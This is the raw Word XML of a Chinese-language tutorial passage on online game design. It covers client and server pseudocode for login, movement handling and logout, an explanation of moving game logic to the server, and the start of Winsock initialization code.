          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他玩家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的移动消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　根据服务器的反馈信息进行其他玩家或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的移动处理</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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新玩家加入游戏</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在客户机中添加显示此玩家</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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>玩家离开游戏</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在客户机中销毁此玩家数据</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break;</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其它消息类型处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit()// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　发送离开消息给服务器</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等待服务器确认</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得到服务器确认消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　与服务器断开连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　释放游戏数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　离开游戏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</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服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Listen()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏服务器等待玩家连接模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w: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等待用户的登入信息</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接收到用户登入信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　分析用户名和密码是否符合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　发送确认允许进入游戏消息给客户机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　把此玩家进入游戏的消息发布给场景中所有玩家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　把此玩家添加到服务器场景中</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else</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断开与客户机的连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Game()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏服务器循环部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w: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等待场景中玩家的操作输入</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接收到某玩家的移动输入或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的移动逻辑输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处只以移动为例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　进行此玩家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在地图场景是否可移动的逻辑判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</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对此玩家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行服务器移动处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　发送移动消息给客户机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　发送此玩家的移动消息给场景上所有玩家</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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　发送不可移动消息给客户机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏服务＝器结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　接收到玩家离开消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　将此消息发送给场景中所有玩家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　发送允许离开的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　将玩家数据存入数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　注销此玩家在服务器内存中的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</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让我们来说明一下上面简单网络游戏模型的运行机制。先来讲讲服务器端，这里服务器端分为三个部分（实际上一个完整的网络游戏远不止这些）：登入模块、游戏模块和登出模块。登入模块用于监听网络游戏客户端发送过来的网络连接消息，并且验证其合法性，然后在服务器中创建这个玩家并且把玩家带领到游戏模块中；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>则提供给玩家用户实际的应用服务，我们在后面会详细介绍这个部分；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在得到玩家要离开游戏的消息后，登出模块则会把玩家从服务器中删除，并且把玩家的属性数据保存到服务器数据库中，如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经验值、等级、生命值等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接下来让我们看看网络游戏的客户端。这时候，客户端不再像单机游戏一样，初始化数据后直接进入游戏，而是在与服务器创建连接，并且获得许可的前提下才进入游戏。除此之外，网络游戏的客户端游戏进程需要不断与服务器进行通讯，通过与服务器交换数据来确定当前游戏的状态，例如其他玩家的位置变化、物品掉落情况。同样，在离开游戏时，客户端会向服务器告知此玩家用户离开，以便于服务器做出相应处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上用简单的伪代码给大家阐述了单机游戏与网络游戏的执行流程，大家应该可以清楚看出两者的差别，以及两者间相互的关系。我们可以换个角度考虑，网络游戏就是把单机游戏的逻辑运算部分搬移到游戏服务器中进行处理，然后把处理结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括其他玩家数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过游戏服务器返回给连接的玩家。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　网络互连</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在了解了网络游戏基本形态之后，让我们进入真正的实际应用部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>分。首先，作为网络游戏，除了常规的单机游戏所必需的东西之外，我们还需要增加一个网络通讯模块，当然，这也是网络游戏较为主要的部分，我们来讨论一下如何实现网络的通讯模块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　一个完善的网络通讯模块涉及面相当广，本文仅对较为基本的处理方式进行讨论。网络游戏是由客户端和服务器组成，相应也需要两种不同的网络通讯处理方式，不过也有相同之处，我们先就它们的共同点来进行介绍。我们这里以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Windows 2000 [2000 Server]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为开发平台，并且使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为网络接口（可能一些朋友会考虑使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DirectPlay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进行网络通讯，不过对于当前在线游戏，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DirectPlay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不适合，具体原因这里就不做讨论了）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　确定好平台与接口后，我们开始进行网络连接创建之前的一些必要的初始化工作，这部分无论是客户端或者服务器都需要进行。让我们看看下面的代码片段：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">WORD wVersionRequested; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">WSADATAwsaData; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">wVersionRequested MAKEWORD(1, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( WSAStartup( wVersionRequested, &amp;wsaData ) &amp;#33;0 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( WinSock Version Error&amp;#33;" );</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上面通过调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来初始化网络设备，接下来进行网络</w:t>
      </w:r>
